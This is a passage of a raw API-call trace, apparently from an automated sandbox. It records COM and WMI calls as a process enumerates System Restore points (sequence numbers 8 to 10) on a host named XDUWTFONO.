pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=8") returned 0x0 [0116.619] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.619] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.620] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.620] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.620] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.620] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.620] IWbemClassObject:Get (in: This=0x6737b50, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3529cdc*=0, plFlavor=0x3529ce0*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), pType=0x3529cdc*=19, plFlavor=0x3529ce0*=0) returned 0x0 [0116.620] IWbemClassObject:Get (in: This=0x6737b50, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3529cdc*=19, plFlavor=0x3529ce0*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), pType=0x3529cdc*=19, plFlavor=0x3529ce0*=0) returned 0x0 [0116.620] CoTaskMemAlloc (cb=0x4) returned 0x77dcc8 [0116.620] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77dcc8, puReturned=0x3526b58 | out: apObjects=0x77dcc8*=0x6738e30, puReturned=0x3526b58*=0x1) returned 0x0 [0116.620] IUnknown:QueryInterface (in: This=0x6738e30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x6738e30) returned 0x0 [0116.621] IUnknown:QueryInterface (in: This=0x6738e30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.621] IUnknown:QueryInterface (in: This=0x6738e30, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.621] IUnknown:AddRef (This=0x6738e30) returned 0x3 [0116.621] IUnknown:QueryInterface (in: This=0x6738e30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.621] IUnknown:QueryInterface (in: This=0x6738e30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.621] IUnknown:QueryInterface (in: This=0x6738e30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x6738e34) returned 0x0 [0116.621] IMarshal:GetUnmarshalClass (in: This=0x6738e34, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.621] IUnknown:Release (This=0x6738e34) returned 0x3 [0116.621] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.621] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.621] IUnknown:QueryInterface (in: This=0x6738e30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.621] IUnknown:Release (This=0x6738e30) returned 0x2 [0116.621] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.621] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.621] IUnknown:QueryInterface (in: This=0x6738e30, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x6738e30) returned 0x0 [0116.621] IUnknown:AddRef (This=0x6738e30) returned 0x4 [0116.621] IUnknown:Release (This=0x6738e30) returned 0x3 [0116.621] IUnknown:Release (This=0x6738e30) returned 0x2 [0116.621] CoTaskMemFree (pv=0x77dcc8) [0116.621] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.621] IUnknown:AddRef (This=0x6738e30) returned 0x3 [0116.622] IWbemClassObject:Get (in: This=0x6738e30, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.622] IWbemClassObject:Get (in: This=0x6738e30, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=9", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.622] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=9") returned 0x6e [0116.622] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=9") returned 0x6e [0116.622] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.622] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.622] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.622] IUnknown:Release (This=0x72015c) returned 0x1 [0116.623] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736dd8) returned 0x0 [0116.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736dd8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.623] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736dd8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6737e40) returned 0x0 [0116.623] WbemDefPath:IUnknown:Release (This=0x6736dd8) returned 0x0 [0116.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6737e40) returned 0x0 [0116.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.624] WbemDefPath:IUnknown:AddRef (This=0x6737e40) returned 0x3 [0116.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77dcc8) returned 0x0 [0116.624] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dcc8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.624] WbemDefPath:IUnknown:Release (This=0x77dcc8) returned 0x3 [0116.624] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.624] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.624] WbemDefPath:IUnknown:Release (This=0x6737e40) returned 0x2 [0116.624] WbemDefPath:IUnknown:Release (This=0x6737e40) returned 0x1 [0116.624] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.624] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6737e40) returned 0x0 [0116.624] WbemDefPath:IUnknown:AddRef (This=0x6737e40) returned 0x3 [0116.624] WbemDefPath:IUnknown:Release (This=0x6737e40) returned 0x2 [0116.624] WbemDefPath:IWbemPath:SetText (This=0x6737e40, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=9") returned 0x0 [0116.624] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.624] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.624] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.624] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.624] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.624] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.625] IWbemClassObject:Get (in: This=0x6738e30, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352a524*=0, plFlavor=0x352a528*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), pType=0x352a524*=19, plFlavor=0x352a528*=0) returned 0x0 [0116.625] IWbemClassObject:Get (in: This=0x6738e30, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352a524*=19, plFlavor=0x352a528*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), pType=0x352a524*=19, plFlavor=0x352a528*=0) returned 0x0 [0116.625] CoTaskMemAlloc (cb=0x4) returned 0x77c1d8 [0116.625] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c1d8, puReturned=0x3526b58 | out: apObjects=0x77c1d8*=0x673a918, puReturned=0x3526b58*=0x1) returned 0x0 [0116.626] IUnknown:QueryInterface (in: This=0x673a918, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673a918) returned 0x0 [0116.626] IUnknown:QueryInterface (in: This=0x673a918, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.626] IUnknown:QueryInterface (in: This=0x673a918, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.626] IUnknown:AddRef (This=0x673a918) returned 0x3 [0116.626] IUnknown:QueryInterface (in: This=0x673a918, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.626] IUnknown:QueryInterface (in: This=0x673a918, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.626] IUnknown:QueryInterface (in: This=0x673a918, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673a91c) returned 0x0 [0116.626] IMarshal:GetUnmarshalClass (in: This=0x673a91c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.626] IUnknown:Release (This=0x673a91c) returned 0x3 [0116.626] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.626] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.626] IUnknown:QueryInterface (in: This=0x673a918, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.626] IUnknown:Release (This=0x673a918) returned 0x2 [0116.626] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.626] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.626] IUnknown:QueryInterface (in: This=0x673a918, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673a918) returned 0x0 [0116.626] IUnknown:AddRef (This=0x673a918) returned 0x4 [0116.626] IUnknown:Release (This=0x673a918) returned 0x3 [0116.627] IUnknown:Release (This=0x673a918) returned 0x2 [0116.627] CoTaskMemFree (pv=0x77c1d8) [0116.627] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.627] IUnknown:AddRef (This=0x673a918) returned 0x3 [0116.627] IWbemClassObject:Get (in: This=0x673a918, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.627] IWbemClassObject:Get (in: This=0x673a918, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=10", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.627] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=10") returned 0x70 [0116.627] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=10") returned 0x70 [0116.627] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.627] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.627] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.627] IUnknown:Release (This=0x72015c) returned 0x1 [0116.628] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736de8) returned 0x0 [0116.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736de8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.628] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736de8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6737eb0) returned 0x0 [0116.628] WbemDefPath:IUnknown:Release (This=0x6736de8) returned 0x0 [0116.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6737eb0) returned 0x0 [0116.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.629] WbemDefPath:IUnknown:AddRef (This=0x6737eb0) returned 0x3 [0116.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c1d8) returned 0x0 [0116.629] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c1d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.629] WbemDefPath:IUnknown:Release (This=0x77c1d8) returned 0x3 [0116.629] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.629] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.629] WbemDefPath:IUnknown:Release (This=0x6737eb0) returned 0x2 [0116.629] WbemDefPath:IUnknown:Release (This=0x6737eb0) returned 0x1 [0116.629] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.629] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737eb0, 